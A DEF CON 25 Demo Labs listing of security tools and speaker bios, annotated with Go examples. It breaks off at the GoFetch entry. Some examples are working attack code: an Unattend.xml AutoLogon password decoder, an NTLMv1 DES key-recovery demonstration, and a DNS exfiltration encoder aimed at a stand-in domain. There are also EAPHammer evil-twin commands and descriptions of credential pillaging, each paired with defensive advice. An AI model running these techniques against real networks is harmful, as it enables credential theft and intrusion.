
DEF CON 25 Hacking Conference

Demo Labs

Android Tamer

Anant Shrivastava

Saturday from 1000-1150 at Table Three

Audience: Mobile (specifically Android)

Android Tamer is a project that provides resources for Android mobile application and device security reviews, whether the task is pentesting, malware analysis, reverse engineering or device assessment. We aim to remove the major pain points of setting up a testing environment by offering several ways to get one running with minimal effort.

https://androidtamer.com/

Anant Shrivastava
Anant Shrivastava is an information security professional with nearly 10 years of hacking and teaching experience, with expertise in mobile, web application, network and Linux security. He is Regional Director Asia Pacific for NotSoSecure Global Services and has led hacking training at some of the world's top security conferences (Black Hat USA/EU/Asia, Nullcon, g0s, c0c0n). Anant also leads the open source projects AndroidTamer (www.androidtamer.com) and CodeVigilant (www.codevigilant.com).




Bropy

Matt Domko

Saturday from 1400-1550 at Table Five

Provides simple anomaly-based IDS capabilities using Bro. Bropy parses logs to generate a network baseline through a simple Y/N interface, and the accompanying Bro script generates logs for traffic that falls outside that baseline.
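
The baseline-then-detect logic, as an added example rather than Bropy's own code: two constructed conn.log excerpts are parsed, the operator approves each distinct (responder host, port, protocol) seen in the learning window, and every later flow outside the approved set is reported, which is what the companion Bro script logs. The baseline key and the approval callback standing in for Bropy's Y/N prompt are assumptions; Bropy's own field choice may differ.

```go
package main

import (
	"fmt"
	"strings"
)

// Flow is the subset of a Bro conn.log record the baseline keys on.
type Flow struct {
	OrigHost, RespHost, RespPort, Proto, Service string
}

func row(fields ...string) string { return strings.Join(fields, "\t") }

// Constructed conn.log excerpts, tab-separated as Bro writes them.
var baselineLog = strings.Join([]string{
	row("#fields", "ts", "uid", "id.orig_h", "id.orig_p", "id.resp_h", "id.resp_p", "proto", "service"),
	row("1500000001.1", "C1", "10.0.0.5", "51000", "10.0.0.10", "53", "udp", "dns"),
	row("1500000002.2", "C2", "10.0.0.5", "51001", "10.0.0.20", "443", "tcp", "ssl"),
	row("1500000003.3", "C3", "10.0.0.6", "51002", "10.0.0.20", "443", "tcp", "ssl"),
	row("1500000004.4", "C4", "10.0.0.6", "51003", "10.0.0.40", "23", "tcp", "-"),
}, "\n")

var liveLog = strings.Join([]string{
	row("#fields", "ts", "uid", "id.orig_h", "id.orig_p", "id.resp_h", "id.resp_p", "proto", "service"),
	row("1500100001.1", "C5", "10.0.0.5", "52000", "10.0.0.10", "53", "udp", "dns"),
	row("1500100002.2", "C6", "10.0.0.5", "52001", "10.0.0.30", "4444", "tcp", "-"),
	row("1500100003.3", "C7", "10.0.0.6", "52002", "10.0.0.20", "443", "tcp", "ssl"),
	row("1500100004.4", "C8", "10.0.0.7", "52003", "10.0.0.40", "23", "tcp", "-"),
}, "\n")

// parseConnLog takes the column layout from the #fields header, skips the
// other #-comment lines and returns one Flow per record.
func parseConnLog(log string) []Flow {
	var cols map[string]int
	var flows []Flow
	for _, line := range strings.Split(log, "\n") {
		if strings.HasPrefix(line, "#fields\t") {
			cols = map[string]int{}
			for i, name := range strings.Split(line, "\t")[1:] {
				cols[name] = i
			}
			continue
		}
		if line == "" || strings.HasPrefix(line, "#") || cols == nil {
			continue
		}
		f := strings.Split(line, "\t")
		if len(f) < len(cols) {
			continue // truncated record
		}
		flows = append(flows, Flow{
			OrigHost: f[cols["id.orig_h"]], RespHost: f[cols["id.resp_h"]],
			RespPort: f[cols["id.resp_p"]], Proto: f[cols["proto"]], Service: f[cols["service"]],
		})
	}
	return flows
}

// key is the question put to the operator once per distinct value:
// is traffic to this responder, port and protocol expected here?
func key(f Flow) string { return f.RespHost + ":" + f.RespPort + "/" + f.Proto }

// buildBaseline records the operator's Y/N answer for each distinct key.
func buildBaseline(flows []Flow, approve func(string) bool) map[string]bool {
	base := map[string]bool{}
	for _, f := range flows {
		if _, asked := base[key(f)]; !asked {
			base[key(f)] = approve(key(f))
		}
	}
	return base
}

// approveNonTelnet stands in for the interactive prompt: everything seen in
// the learning window is normal except cleartext telnet.
func approveNonTelnet(k string) bool { return !strings.HasSuffix(k, ":23/tcp") }

// findAnomalies is the detection step: any flow whose key was never approved.
func findAnomalies(base map[string]bool, flows []Flow) []Flow {
	var out []Flow
	for _, f := range flows {
		if !base[key(f)] {
			out = append(out, f)
		}
	}
	return out
}

func main() {
	base := buildBaseline(parseConnLog(baselineLog), approveNonTelnet)
	for _, f := range findAnomalies(base, parseConnLog(liveLog)) {
		fmt.Printf("outside baseline: %s -> %s:%s/%s (%s)\n", f.OrigHost, f.RespHost, f.RespPort, f.Proto, f.Service)
	}
}
```

Two caveats apply to any baseline of this shape: an attacker already present during the learning window becomes "normal" unless the operator actually reads each prompt, and anything that rides an approved channel (command and control over 443 to an approved host) is invisible to it, so it complements signature detection rather than replacing it.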

https://github.com/hashtagcyber/bropy

Matt Domko
"I'm just a guy playing with Legos. I crudely assemble the knowledge I have to build a solution for my problems."

Matt Domko is currently an Information Security instructor for Chiron Technology Services in Augusta, Georgia. His experiences as an enterprise administrator and cyber network defender for the United States Army are what drive his passion for network defense and "Blue Teaming". Bikes, Beards, and Karaoke




bullDozer

Keith Lee

Saturday from 1400-1550 at Table Two

Audience: Offense

The tool takes a username and password that you have captured and cracked with Responder or from other sources, together with an IP range, subnet or list of IP addresses.

It then works its way around the network, attempts to gain access to each host, finds and dumps passwords and hashes, and reuses them to compromise further hosts.

Below are some of the places the tool looks for hashes and passwords:
1. SYSVOL
2. File Shares
3. Memory
4. Tokens (Incognito)
5. MSSQL service credentials
6. Unattend.xml, sysprep.xml, sysprep.inf
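
Item 6 in concrete form, as an added example that is not bullDozer's own code: an extractor for the AutoLogon credential in Unattend.xml. When PlainText is false, Windows Setup stores base64(UTF-16LE(password + "Password")) (the UserAccounts element uses the suffix "AdministratorPassword"); that is obfuscation with no key, so a read of the file is a read of the credential. The answer file below is constructed and much smaller than a real one.

```go
package main

import (
	"encoding/base64"
	"encoding/xml"
	"errors"
	"fmt"
	"strings"
	"unicode/utf16"
)

// Constructed answer file; the AutoLogon block may also sit in the specialize pass.
const sampleUnattend = `<?xml version="1.0" encoding="utf-8"?>
<unattend xmlns="urn:schemas-microsoft-com:unattend">
  <settings pass="oobeSystem">
    <component name="Microsoft-Windows-Shell-Setup" processorArchitecture="amd64">
      <AutoLogon>
        <Username>svc_deploy</Username>
        <Domain>CORP</Domain>
        <Enabled>true</Enabled>
        <Password>
          <Value>UwBlAGMAcgBlAHQAMQBQAGEAcwBzAHcAbwByAGQA</Value>
          <PlainText>false</PlainText>
        </Password>
      </AutoLogon>
    </component>
  </settings>
</unattend>`

// Only the elements the search cares about are modelled.
type autoLogon struct {
	Username string `xml:"Username"`
	Domain   string `xml:"Domain"`
	Password struct {
		Value     string `xml:"Value"`
		PlainText bool   `xml:"PlainText"`
	} `xml:"Password"`
}

type unattend struct {
	Settings []struct {
		Components []struct {
			AutoLogon *autoLogon `xml:"AutoLogon"`
		} `xml:"component"`
	} `xml:"settings"`
}

// encodeUnattendPassword is what Setup does when PlainText is false: append the
// element name, encode as UTF-16LE, base64. No key is involved anywhere.
func encodeUnattendPassword(password, elementName string) string {
	u := utf16.Encode([]rune(password + elementName))
	raw := make([]byte, 2*len(u))
	for i, c := range u {
		raw[2*i], raw[2*i+1] = byte(c), byte(c>>8)
	}
	return base64.StdEncoding.EncodeToString(raw)
}

func decodeUnattendPassword(value, elementName string) (string, error) {
	raw, err := base64.StdEncoding.DecodeString(strings.TrimSpace(value))
	if err != nil {
		return "", err
	}
	if len(raw)%2 != 0 {
		return "", errors.New("value is not UTF-16")
	}
	u := make([]uint16, len(raw)/2)
	for i := range u {
		u[i] = uint16(raw[2*i]) | uint16(raw[2*i+1])<<8
	}
	s := string(utf16.Decode(u))
	if !strings.HasSuffix(s, elementName) {
		return "", errors.New("decoded value lacks the " + elementName + " suffix")
	}
	return strings.TrimSuffix(s, elementName), nil
}

// extractAutoLogon returns the first AutoLogon credential in the file, decoding
// it when obfuscated and passing it through when PlainText is true.
func extractAutoLogon(doc string) (user, pass string, err error) {
	var u unattend
	if err = xml.Unmarshal([]byte(doc), &u); err != nil {
		return "", "", err
	}
	for _, s := range u.Settings {
		for _, c := range s.Components {
			if c.AutoLogon == nil {
				continue
			}
			user = c.AutoLogon.Username
			if c.AutoLogon.Domain != "" {
				user = c.AutoLogon.Domain + `\` + user
			}
			if c.AutoLogon.Password.PlainText {
				return user, c.AutoLogon.Password.Value, nil
			}
			pass, err = decodeUnattendPassword(c.AutoLogon.Password.Value, "Password")
			return user, pass, err
		}
	}
	return "", "", errors.New("no AutoLogon element")
}

func main() {
	user, pass, err := extractAutoLogon(sampleUnattend)
	fmt.Printf("user=%q pass=%q err=%v\n", user, pass, err)
}
```

On a deployed host the copies worth checking are under C:\Windows\Panther and C:\Windows\System32\Sysprep, plus whatever the deployment share still holds; the defensive fix is to delete answer files after imaging and never leave an AutoLogon or AdministratorPassword element behind.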

It will also exploit the Domain Controller if it is vulnerable to MS14-068 (CVE-2014-6324) and dump the hashes.

Pillaging the Corporate Network

The tool will also attempt to 'rob' the shares and hosts of sensitive data and information:
1. Finding files whose filename contains the word 'password'
2. Dumping wireless, WinVNC, UltraVNC, PuTTY, SNMP, Windows AutoLogon and Firefox stored credentials
3. Finding KeePass databases, FileZilla sitemanager.xml, Apache httpd.conf, etc., if they contain credentials
4. Finding PII and credit card track data in memory
5. Browser credentials

It will iterate and continue to test and exploit the systems until all hosts are compromised. Another useful feature is for attackers who want to find the right credentials in order to access a certain folder under the shares on the host.

For example, \\host1\share\private

You might have the account that allows you to access \\host1\share but you do not know which account you need to access \\host1\share\private.

Using the credentials it has captured, the tool finds the 'right key' to the lock.

It is possible to disable any of the options (e.g. no memory search for PANs) and to add a random delay to its operations so as to remain stealthy.

We are planning to allow users to develop modules/plugins and encourage development so that its feature set can be extended.

Keith Lee
Keith Lee is a Senior Security Consultant with Trustwave's SpiderLabs Asia-Pacific. SpiderLabs is one of the world's largest specialist security teams, with over 100 consultants spread across North America, South America, Europe and the Asia Pacific. SpiderLabs has a focus on original security research and regularly presents at conferences such as Black Hat, DEF CON, OWASP, Hack In The Box and Ruxcon. Keith is based out of Singapore and his primary focus is on providing penetration testing, social engineering and incident response services to clients in the Asia-Pacific region.




CellAnalysis

Pedro Cabrera

Saturday from 1600-1750 at Table Three

Audience: Defensive and mobile security

CellAnalysis is one more tool to be added to the pentester's arsenal. Other tools for finding fake cells exist, but most of them use active monitoring: they watch the traffic reaching the SIM card in a smartphone, so they only see attacks on the network that SIM belongs to. CellAnalysis takes a different approach. It performs passive traffic monitoring, so it needs neither a SIM card nor a mobile device, only an OsmocomBB phone or a compatible SDR (rtl-sdr, USRP, HackRF or bladeRF), to start monitoring every frequency of the GSM spectrum.

http://www.fakebts.com/

Pedro Cabrera
Software Defined Radio and UAV enthusiast, Pedro Cabrera has worked for more than 10 years at the main Spanish telecommunications operators, conducting security audits and pentesting in mobile and fixed networks. Besides working with the telecommunications operators, Pedro leads open source projects such as intrusion detection systems for GSM networks, which has led him to study the various fake 2G cell attacks and existing solutions. He has also collaborated on press articles on this topic, wardriving around Madrid looking for how many fake stations can be found, and where, just by walking. During this year he has participated in security events, delivering the training "Attacking 2G/3G Mobile Networks, Smartphones and Apps" (Black Hat Asia), demonstrating how to remotely inject commands into commercial drones ("All your bebop drones still belong to us: drone hijacking", RootedCon) and showing how to intercept 2G calls and SMS on a frequency-hopping network using low cost SDR, HackRF and bladeRF.




https://crack.sh/

David Hulton

Ian Foster

Saturday from 1200-1350 at Table Two

Audience: Offense, Mobile, Hardware

Cracking DES has been doable for state actors for the past few decades, but most people don't have access to a supercomputer or $100k of dedicated hardware lying around. In 2012, Moxie Marlinspike and David Hulton released Cloudcracker.com, a service that brought this to the masses with 100% success rate cracking of MSCHAPv2 (PPTP VPNs and WPA-Enterprise). Since then Cloudcracker.com has vanished, but ToorCon has taken over and released https://crack.sh, with added features for cracking MSCHAPv1 (Windows Lanman/NTLMv1 login), Kerberos authentication, and a general purpose interface for cracking other systems that still use DES. We will also be releasing a free real-time service for cracking DES (in ~3 seconds) with chosen plaintext, providing a full break of Windows Lanman/NTLMv1 authentication and allowing people to test whether their devices do proper WPA-Enterprise certificate checking.
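
Why a DES cracker breaks NTLMv1 and MSCHAPv2 outright, shown as an added example in Go (not crack.sh's code; the NT hash used is that of the string "password", and the challenge is the fixed value 1122334455667788 that crack.sh's NTLMv1 service asks a rogue server to hand out). The client zero-pads its 16-byte NT hash to 21 bytes, cuts that into three 7-byte DES keys and encrypts the same 8-byte challenge under each. With the challenge known, each 8-byte block of the response is a single known-plaintext DES encryption: K1 and K2 fall to a 2^56 exhaustive search, and K3 contains only two unknown bytes, so a laptop recovers it in 65536 trials. The block below builds the response and runs the cheap K3 search; the oracle it uses is the same one the hardware runs 2^56 times for K1 and K2.

```go
package main

import (
	"bytes"
	"crypto/des"
	"encoding/hex"
	"fmt"
)

// Constructed inputs: the NT hash of "password" and the fixed challenge a
// rogue server hands out so that every capture shares one known plaintext.
var (
	sampleNTHash, _    = hex.DecodeString("8846f7eaee8fb117ad06bdd830b7586c")
	sampleChallenge, _ = hex.DecodeString("1122334455667788")
)

// desKey expands a 7-byte key fragment into the 8-byte form DES takes: seven
// data bits per byte, with the low (parity) bit cleared; DES ignores parity.
func desKey(k7 []byte) []byte {
	k := []byte{
		k7[0],
		k7[0]<<7 | k7[1]>>1,
		k7[1]<<6 | k7[2]>>2,
		k7[2]<<5 | k7[3]>>3,
		k7[3]<<4 | k7[4]>>4,
		k7[4]<<3 | k7[5]>>5,
		k7[5]<<2 | k7[6]>>6,
		k7[6] << 1,
	}
	for i := range k {
		k[i] &= 0xFE
	}
	return k
}

func desEncrypt(k7, block []byte) []byte {
	c, err := des.NewCipher(desKey(k7))
	if err != nil {
		panic(err)
	}
	out := make([]byte, 8)
	c.Encrypt(out, block)
	return out
}

// ntlmv1Response builds the 24-byte client response: NT hash zero-padded to
// 21 bytes, split into three DES keys, each encrypting the same challenge.
// There is no salt and no binding to a client nonce in plain NTLMv1.
func ntlmv1Response(ntHash, challenge []byte) []byte {
	key21 := append(append([]byte{}, ntHash...), 0, 0, 0, 0, 0)
	var resp []byte
	for i := 0; i < 3; i++ {
		resp = append(resp, desEncrypt(key21[i*7:i*7+7], challenge)...)
	}
	return resp
}

// keyMatches is the oracle an exhaustive search evaluates: for K1 and K2 it
// runs up to 2^56 times, which is the job crack.sh offloads to FPGAs.
func keyMatches(k7, challenge, block []byte) bool {
	return bytes.Equal(desEncrypt(k7, challenge), block)
}

// recoverK3 does the cheap third of the attack: K3 is hash[14:16] followed by
// five zero bytes, so 65536 trials give back two bytes of the NT hash.
func recoverK3(challenge, resp []byte) (uint16, bool) {
	for c := 0; c < 1<<16; c++ {
		k7 := []byte{byte(c >> 8), byte(c), 0, 0, 0, 0, 0}
		if keyMatches(k7, challenge, resp[16:24]) {
			return uint16(c), true
		}
	}
	return 0, false
}

func main() {
	resp := ntlmv1Response(sampleNTHash, sampleChallenge)
	fmt.Printf("NTLMv1 response: %x\n", resp)
	if k3, ok := recoverK3(sampleChallenge, resp); ok {
		fmt.Printf("hash[14:16] = %04x (expected %x)\n", k3, sampleNTHash[14:16])
	}
	fmt.Println("K1 oracle on the real key:", keyMatches(sampleNTHash[0:7], sampleChallenge, resp[0:8]))
}
```

Once all three keys are known the attacker holds the NT hash itself, usable for pass-the-hash without ever cracking the password. MSCHAPv2 has the identical structure with the challenge replaced by the first 8 bytes of SHA1(peer challenge || authenticator challenge || username), which is why Cloudcracker's 2012 break applied to PPTP and WPA-Enterprise. The mitigations are the ones the page hints at: refuse NTLMv1 and LM entirely (LmCompatibilityLevel 5) and, for WPA-Enterprise, validate the RADIUS server certificate on every client so a rogue access point never gets to choose the challenge.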

https://crack.sh/

David Hulton
David Hulton organizes the ToorCon suite of conferences and has spent nearly 20 years doing security research mostly focused on reverse engineering and cracking crypto. He's mostly known for developing the bsd-airtools wireless attack tools in the early 2000s, developing and presenting the first practical attack on GSM A5/1 in 2008, and releasing a DES cracking service and tools to perform a full break of MSCHAPv2 authentication in 2012.

Ian Foster




CrackMapExec

Marcello Salvati

Saturday from 1400-1550 at Table Three

Audience: Network Defense and Offense

Ever needed to pentest a network with 10 gazillion hosts in a very limited time frame? Ever wanted to Mimikatz entire subnets? How about shelling entire subnets? Dumping SAM hashes? Share spidering? Keeping track of all the credentials you pillaged? (The list goes on!) And doing all of this in the stealthiest way possible? Well, look no further than CrackMapExec! CrackMapExec (a.k.a. CME) is a modular post-exploitation tool written in Python that helps automate assessing the security of *large* Active Directory networks. Built with stealth in mind, CME follows the concept of "living off the land": it abuses built-in Active Directory features and protocols to achieve its functionality, which lets it evade most endpoint protection, IDS and IPS solutions. Although meant primarily for offensive use, CME can be used by blue teams as well to assess account privileges, find misconfigurations and simulate attack scenarios. In this demo the author will be showing off v4.0, a major update bringing more features and capabilities than ever before. If you are interested in the latest Active Directory attacks and techniques, weaponizing them at scale and general cool AD stuff, this is the demo for you!

https://github.com/byt3bl33d3r/CrackMapExec

Marcello Salvati
Marcello Salvati (@byt3bl33d3r) is a security consultant who's really good at writing bios. He's so good at writing bios that he was awarded the 'The Best Bio Ever from *insert date when bios became a thing* to 2017" award. (Totally legit award. Don't Google it, Bing it).

His boss Liz asked him about ten times to re-write his bio because "It was too good. He had to make it less good. We didn't want people to cry in shame when they read it. It was like a poem ... sniff.. *a single tear is shed*".

By day a security consultant, by night a tool developer who discovered a novel technique to turn tea, sushi and dank memes into somewhat functioning code he has recently devoted his attention to the wonderful rabbit hole that is Active Directory which has become his favorite thing to 0wn.




Crypt-Keeper

Maurice Carey

Saturday from 1400-1550 at Table Four

Audience: Anyone who wants to run a service to securely exchange files.

Crypt-Keeper is a service for securely exchanging files.

Equipment Requirements (Network Needs, Displays, etc): A display or projector would be great. The app will be running on AWS, so a network connection will be needed as well.

https://github.com/mauricecarey/crypt-keeper

Maurice Carey
Maurice is the Principal Software Engineer at TargetSmart, a small company focused on big data problems, where he is helping create and scale their customer-facing software platform for future business growth. Previously, Maurice has worked as a Software Architect focusing on data analytics and micro-services, and as a software engineer at companies like General Motors and Amazon.com.

Maurice has been a speaker or presenter publicly at many local meet ups and small conferences, as well as presenting papers at the IEEE International Conference on Program Comprehension (ICPC), and IEEE Enterprise Distributed Object Computing (EDOC) conferences.

Maurice received a Bachelor's Degree in Computer Science and PhD in Computer Science from Arizona State University while establishing himself as an entrepreneur working his way through school writing code for various clients.




DNS-Exfil-Suite

Nolan Berry

Cory Schwartz

Saturday from 1600-1750 at Table Two

Audience: I think the best audience here would be PenTesters, DNS Engineers and people looking to learn more about DNS based attack methods.

Our tool kit provides multiple methods of data exfiltration, infiltration and botnet command and control systems using 100% DNS traffic that is either hard to detect or impossible to detect.
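
The encoding side of such a tunnel, as an added example in Go that is not the DNS-Exfil-Suite code: data is cut into chunks, each chunk becomes a lower-case base32 label under a domain the attacker is authoritative for, and the authoritative server reassembles the chunks from the query names it logs. The label layout (sequence number, chunk, session, domain), the 30-byte chunk size and the example domain are my choices. Lower-case base32 is used because labels must survive case-folding resolvers and may not contain '=' padding.

```go
package main

import (
	"encoding/base32"
	"errors"
	"fmt"
	"strconv"
	"strings"
)

// Base32 without padding: DNS-safe alphabet, no '=' (not a valid label character).
var b32 = base32.StdEncoding.WithPadding(base32.NoPadding)

// 30 bytes encode to exactly 48 characters, under the 63-byte label limit of
// RFC 1035 and leaving room for the other labels within the 253-byte name limit.
const chunkBytes = 30

// encodeQueries turns data into one query name per chunk:
// <seq>.<base32 chunk>.<session>.<domain>. The sequence label lets the
// receiver reorder and detect loss, since resolvers reorder, retry and drop.
func encodeQueries(session string, data []byte, domain string) []string {
	var names []string
	for i := 0; i*chunkBytes < len(data); i++ {
		end := (i + 1) * chunkBytes
		if end > len(data) {
			end = len(data)
		}
		chunk := strings.ToLower(b32.EncodeToString(data[i*chunkBytes : end]))
		names = append(names, fmt.Sprintf("%d.%s.%s.%s", i, chunk, session, domain))
	}
	return names
}

// decodeQueries is the authoritative-server side: it reassembles one session
// from the query names it saw, in whatever order they arrived.
func decodeQueries(names []string, session, domain string) ([]byte, error) {
	suffix := "." + session + "." + domain
	chunks := map[int][]byte{}
	for _, n := range names {
		if !strings.HasSuffix(n, suffix) {
			continue // another session, or ordinary traffic for the zone
		}
		parts := strings.SplitN(strings.TrimSuffix(n, suffix), ".", 2)
		if len(parts) != 2 {
			return nil, errors.New("malformed query name: " + n)
		}
		seq, err := strconv.Atoi(parts[0])
		if err != nil {
			return nil, err
		}
		raw, err := b32.DecodeString(strings.ToUpper(parts[1]))
		if err != nil {
			return nil, err
		}
		chunks[seq] = raw
	}
	var out []byte
	for i := 0; i < len(chunks); i++ {
		c, ok := chunks[i]
		if !ok {
			return nil, fmt.Errorf("chunk %d never arrived", i)
		}
		out = append(out, c...)
	}
	return out, nil
}

// longestLabel is the first thing a defender's DNS analytics looks at:
// legitimate names rarely carry 40-plus character labels in volume.
func longestLabel(name string) int {
	longest := 0
	for _, l := range strings.Split(name, ".") {
		if len(l) > longest {
			longest = len(l)
		}
	}
	return longest
}

func main() {
	secret := []byte("constructed sample: AKIAIOSFODNN7EXAMPLE\n")
	names := encodeQueries("s1", secret, "exfil.example.com")
	for _, n := range names {
		fmt.Printf("%-78s longest label %d\n", n, longestLabel(n))
	}
	back, err := decodeQueries(names, "s1", "exfil.example.com")
	fmt.Printf("round trip ok: %v (err=%v)\n", string(back) == string(secret), err)
}
```

"Hard to detect" holds against signature-based IDS, which sees only well-formed DNS. What does catch this is statistics on the resolver logs: label length and entropy, the rate of never-before-seen subdomains per client, and query volume to a single zone. The 48-character labels above are exactly what those checks flag, so a stealthier tunnel trades throughput for shorter labels, slower pacing and a wider spread of names.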

https://github.com/ndberry/DNS_Exfil_Tool

Nolan Berry
DNS Engineer
-----------
Nolan has been working with DNS for 2 years and has always been very interested in security. His passion for both security and DNS has led him to develop a platform for DNS exploitation in an attempt to raise awareness of known but under-appreciated security flaws.

Cory Schwartz
Site Reliability Engineer, Twitter
----------
Cory has a background in signals intelligence and processing: after graduating with a degree in cryptography he served in the Air Force and then as a government contractor supporting the intelligence community. He then worked at Rackspace on cloud storage and systems automation. He is now an SRE at Twitter in San Francisco.




EAPHammer

Gabriel Ryan

Saturday from 1600-1750 at Table Five

Audience: Offensive security professionals, red teamers, penetration testers, researchers.

EAPHammer is a toolkit for performing targeted evil twin attacks against WPA2-Enterprise networks. It is designed to be used in full scope wireless assessments and red team engagements. As such, focus is placed on providing an easy-to-use interface that can be leveraged to execute powerful wireless attacks with minimal manual configuration. To illustrate how fast this tool is, here's an example of how to set up and execute a credential-stealing evil twin attack against a WPA2-TTLS network in just two commands:

# generate certificates
./eaphammer --cert-wizard

# launch attack
./eaphammer -i wlan0 --channel 4 --auth ttls --wpa 2 --essid CorpWifi --creds

Features:
* Steal RADIUS credentials from WPA-EAP and WPA2-EAP networks.
* Perform hostile portal attacks to steal AD creds and perform indirect wireless pivots
* Perform captive portal attacks
* Built-in Responder integration
* Support for Open networks and WPA-EAP/WPA2-EAP
* No manual configuration necessary for most attacks.
* No manual configuration necessary for installation and setup process

https://github.com/s0lst1c3/eaphammer

Gabriel Ryan
Gabriel Ryan is a security consultant and researcher with a passion for wireless and infrastructure testing. He currently works for Gotham Digital Science at their New York office, where he provides full scope red team penetration testing capabilities for a diverse range of clients. He also contributes heavily to his company's research division, GDS Labs. Previously, Gabriel has worked as a penetration tester and researcher for the Virginia-based defense contractor OGSystems, and as a systems programmer for Rutgers University. He also is a member of the BSides Las Vegas senior staff, coordinating wireless security for the event. In his spare time, he enjoys live music, exploring the outdoors, and riding motorcycles.




Fuzzapi

Abhijeth Dugginapeddi

Lalith Rallabhandi

Srinivas Rao

Saturday from 1000-1150 at Table One

Audience: AppSec, Web/Mobile Developers, DevOps

Fuzzapi is a REST API pen testing tool that automatically runs a range of vulnerability checks against your APIs. Rather than a tool that only identifies vulnerabilities in web services, we have built a platform that enables everyone to test and understand the large range of API vulnerabilities that exist in both web and mobile applications. After seeing the benefits of automating REST API pen testing with the basic Fuzzapi tool, the authors decided to build a better version that can look for vulnerabilities in APIs from the moment they are written. REST APIs are often one of the main sources of vulnerabilities in web and mobile applications: developers quite commonly make mistakes in defining permissions on cross-platform APIs, which gives attackers a chance to abuse them. Fuzzapi is written in Ruby on Rails and helps quickly identify such commonly found API vulnerabilities so that developers can fix them earlier in the SDLC. The first released version of the tool has limited functionality; the authors are currently working on the next version, which will completely automate the process and save a lot of time and resources.

https://www.youtube.com/watch?v=43G_nSTdxLk&t=321s

Abhijeth Dugginapeddi
Abhijeth D (@abhijeth) is a Security Consultant working for a bank in Australia. Previously worked with Adobe Systems, TCS and Sourcenxt. Security enthusiast in the fields of penetration testing and application/mobile/infrastructure security. Believes in the need for more security awareness and free responsible disclosures. Got lucky in finding a few vulnerabilities with Google, Yahoo, Facebook, Microsoft, eBay, PayPal, etc., and is one of the top 5 researchers on Synack, a bug bounty platform. Also interested in social media marketing, digital marketing and web design.

Lalith Rallabhandi
Lalith Rallabhandi (@lalithr95) currently works as a Security Intern at Shopify. He has previously worked with HackerRank, Zomato and Google Summer of Code. Likes to code and break stuff, mostly web applications, and is a Ruby on Rails enthusiast. Found bugs with Google, Microsoft, Facebook, Badoo, Twitter, etc.

Srinivas Rao




GibberSense

Ajit Hatti

Saturday from 1000-1150 at Table Two

Audience: Cryptologists, cryptanalysts, forensic investigators, developers and testers.

Found a gibberish string or unknown file on a forensics or investigation assignment and don't know what it is? Throw it at GibberSense; it might make some sense out of it.

Not sure whether a file is encrypted, encoded or obfuscated with a substitution cipher? GibberSense gives you a statistical analysis of the contents, a direction for further investigation and an excellent visualization.

Being an extensible framework, GibberSense also provides tools for simple XOR encryption and frequency analysis, which give it basic cryptanalysis capabilities.

GibberSense is an open source, experimental tool for improving investigations.
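
The statistics behind that triage, as an added example (Go, not GibberSense's own code): byte entropy separates ciphertext and compressed data from everything else; over printable input, the index of coincidence of the letters is unchanged by any monoalphabetic substitution while a dot product with English letter frequencies collapses as soon as the alphabet is permuted, so the pair separates plaintext from substitution ciphers from flat-alphabet encodings such as base64 or polyalphabetic ciphers. The thresholds are assumptions tuned for a couple of hundred letters, and the sample text is constructed from public-domain Dickens.

```go
package main

import (
	"fmt"
	"math"
)

// Constructed sample: lower-cased, punctuation stripped, so the letter
// statistics are those of ordinary English prose.
const sampleText = "it was the best of times it was the worst of times it was the age of wisdom it was the age of foolishness it was the epoch of belief it was the epoch of incredulity it was the season of light it was the season of darkness it was the spring of hope it was the winter of despair"

// Relative frequencies of a..z in English, in percent.
var english = [26]float64{
	8.167, 1.492, 2.782, 4.253, 12.702, 2.228, 2.015, 6.094, 6.966, 0.153, 0.772, 4.025, 2.406,
	6.749, 7.507, 1.929, 0.095, 5.987, 6.327, 9.056, 2.758, 0.978, 2.360, 0.150, 1.974, 0.074,
}

// shannonEntropy in bits per byte: close to 8 for ciphertext and compressed
// data, noticeably lower for anything with structure.
func shannonEntropy(b []byte) float64 {
	var counts [256]float64
	for _, c := range b {
		counts[c]++
	}
	h := 0.0
	for _, n := range counts {
		if n > 0 {
			p := n / float64(len(b))
			h -= p * math.Log2(p)
		}
	}
	return h
}

// letterStats looks at letters only. The index of coincidence is invariant
// under any monoalphabetic substitution (about 0.066 for English, 0.038 for a
// flat alphabet). The similarity is the dot product with English frequencies
// (about 0.065 for English, roughly half once the alphabet is permuted).
func letterStats(b []byte) (ioc, sim float64) {
	var counts [26]float64
	n := 0.0
	for _, c := range b {
		if c >= 'A' && c <= 'Z' {
			c += 'a' - 'A'
		}
		if c >= 'a' && c <= 'z' {
			counts[c-'a']++
			n++
		}
	}
	if n < 2 {
		return 0, 0
	}
	for i, c := range counts {
		ioc += c * (c - 1) / (n * (n - 1))
		sim += c / n * english[i] / 100
	}
	return ioc, sim
}

func printable(b []byte) bool {
	for _, c := range b {
		if (c < 0x20 || c > 0x7e) && c != '\n' && c != '\r' && c != '\t' {
			return false
		}
	}
	return true
}

// classify returns a direction for further investigation, not a verdict.
func classify(b []byte) string {
	if !printable(b) {
		if shannonEntropy(b) > 7.5 {
			return "encrypted or compressed"
		}
		return "binary"
	}
	ioc, sim := letterStats(b)
	switch {
	case ioc > 0.06 && sim > 0.05:
		return "plaintext"
	case ioc > 0.06:
		return "monoalphabetic substitution"
	}
	return "encoded or polyalphabetic"
}

// caesar manufactures a substitution-cipher sample from the plaintext.
func caesar(b []byte, shift int) []byte {
	out := make([]byte, len(b))
	for i, c := range b {
		if c >= 'a' && c <= 'z' {
			c = 'a' + (c-'a'+byte(shift))%26
		}
		out[i] = c
	}
	return out
}

func main() {
	for _, s := range [][]byte{[]byte(sampleText), caesar([]byte(sampleText), 13), []byte("c2VjcmV0IGRhdGE=")} {
		ioc, sim := letterStats(s)
		fmt.Printf("entropy=%.2f ioc=%.3f sim=%.3f -> %s\n", shannonEntropy(s), ioc, sim, classify(s))
	}
}
```

The entropy test is the one investigators lean on most and it is also the easiest to fool: a short ciphertext has low measured entropy simply because few of the 256 values appear, and a compressed archive or a random-looking key file scores the same as encryption, so entropy says "no structure at this level" and nothing more.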

https://github.com/smxlabs/gibbersense

Ajit Hatti
Ajit Hatti has been contributing to the secure usage of cryptography for the past 5 years and is currently focusing on the security issues of blockchain-related technologies. He is the author of the LAMMA and GibberSense tools, which help in securing crypto and PKI implementations.

Ajit is founder of SecurityMonx and is also working in collaboration with Payatu on futuristic projects. He also co-founded the null Open Security Community and has worked with Symantec, Emerson, Zscaler, IBM and Bluelane as a Security Researcher.

Ajit has presented his work at Black Hat, DEF CON and the Crypto & Privacy Village, and organizes Nullcon in India. He loves to run, volunteers at BSides LV and organizes The World Run by Hackers.




GoFetch

Tal Maor

Sunday from 1000-1150 at Table Three

Audience: Enterprise, Applied Security, Windows domain, Defense and offense

